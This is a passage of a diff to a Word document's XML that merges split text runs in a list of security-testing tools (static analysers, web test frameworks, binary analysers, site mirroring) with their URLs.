-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>FxCop</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Microsoft’s FxCop</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -28113,7 +27411,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -28121,17 +27418,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Pscan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.striker.ottawa.on.ca/~aland/pscan</w:t>
+        <w:t>Pscan - http://www.striker.ottawa.on.ca/~aland/pscan</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28149,7 +27436,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -28157,17 +27443,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>FindBugs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://findbugs.sourceforge.net</w:t>
+        <w:t>FindBugs - http://findbugs.sourceforge.net</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28193,7 +27469,6 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">آنالیزور های </w:t>
       </w:r>
       <w:r>
@@ -28268,27 +27543,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Ounce labs </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Prexis</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.ouncelabs.com</w:t>
+        <w:t>Ounce labs Prexis - http://www.ouncelabs.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28305,7 +27560,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -28313,17 +27567,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Veracode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.veracode.com</w:t>
+        <w:t>Veracode - http://www.veracode.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28340,7 +27584,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -28348,17 +27591,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>GrammaTech</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.grammatech.com</w:t>
+        <w:t>GrammaTech - http://www.grammatech.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28375,7 +27608,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -28383,17 +27615,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>ParaSoft</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.parasoft.com</w:t>
+        <w:t>ParaSoft - http://www.parasoft.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28434,7 +27656,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -28442,17 +27663,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>CodeWizard</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.parasoft.com/products/wizard</w:t>
+        <w:t>CodeWizard - http://www.parasoft.com/products/wizard</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28469,7 +27680,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -28477,37 +27687,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Armorize</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>CodeSecure</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.armorize.com/product/</w:t>
+        <w:t>Armorize CodeSecure - http://www.armorize.com/product/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28525,7 +27705,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -28533,37 +27712,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Checkmarx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>CxSuite</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.checkmarx.com</w:t>
+        <w:t>Checkmarx CxSuite - http://www.checkmarx.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28693,7 +27842,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -28701,48 +27849,27 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>typically</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t>typically make use of a Unit Testing framework to construct test suites and test cases. Most, if not all, can be adapted to</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> make use of a Unit Testing framework to construct test suites and test cases. Most, if not all, can be adapted to</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>perform</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> security specific tests in addition to functional tests.</w:t>
+        <w:t>perform security specific tests in addition to functional tests.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28831,7 +27958,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -28839,17 +27965,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>HtmlUnit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://htmlunit.sourceforge.net</w:t>
+        <w:t>HtmlUnit - http://htmlunit.sourceforge.net</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28873,27 +27989,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">A Java and JUnit based framework that uses the Apache </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>HttpClient</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> as the transport.</w:t>
+        <w:t>A Java and JUnit based framework that uses the Apache HttpClient as the transport.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28917,6 +28013,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Very robust and configurable and is used as the engine for a number of other testing tools.</w:t>
       </w:r>
     </w:p>
@@ -28934,7 +28031,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -28942,17 +28038,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>jWebUnit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://jwebunit.sourceforge.net</w:t>
+        <w:t>jWebUnit - http://jwebunit.sourceforge.net</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28976,27 +28062,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">A Java based meta-framework that uses </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>htmlunit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> or selenium as the testing engine.</w:t>
+        <w:t>A Java based meta-framework that uses htmlunit or selenium as the testing engine.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -29013,7 +28079,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -29021,37 +28086,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Canoo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Webtest</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://webtest.canoo.com</w:t>
+        <w:t>Canoo Webtest - http://webtest.canoo.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -29075,27 +28110,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">An XML based testing tool that provides a facade on top of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>htmlunit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>An XML based testing tool that provides a facade on top of htmlunit.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -29167,7 +28182,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Very actively maintained.</w:t>
       </w:r>
     </w:p>
@@ -29185,7 +28199,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -29193,17 +28206,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>HttpUnit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://httpunit.sourceforge.net</w:t>
+        <w:t>HttpUnit - http://httpunit.sourceforge.net</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -29283,7 +28286,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -29291,17 +28293,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Watij</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://watij.com</w:t>
+        <w:t>Watij - http://watij.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -29366,7 +28358,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -29374,17 +28365,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Solex</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://solex.sourceforge.net</w:t>
+        <w:t>Solex - http://solex.sourceforge.net</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -29627,15 +28608,7 @@
         <w:ind w:left="1440"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">• Rational </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>PurifyPlus</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> - </w:t>
+        <w:t xml:space="preserve">• Rational PurifyPlus - </w:t>
       </w:r>
       <w:hyperlink r:id="rId16" w:history="1">
         <w:r>
@@ -29686,27 +28659,15 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>BugScam</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://sourceforge.net/projects/bugscam</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>BugScam - http://sourceforge.net/projects/bugscam</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -29724,27 +28685,15 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>BugScan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.hbgary.com</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>BugScan - http://www.hbgary.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -29762,27 +28711,15 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Veracode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.veracode.com</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>Veracode - http://www.veracode.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -29858,6 +28795,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Site Mirroring</w:t>
       </w:r>
     </w:p>
@@ -29876,27 +28814,15 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>wget</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.gnu.org/software/wget, http://www.interlog.com/~tcharron/wgetwin.html</w:t>
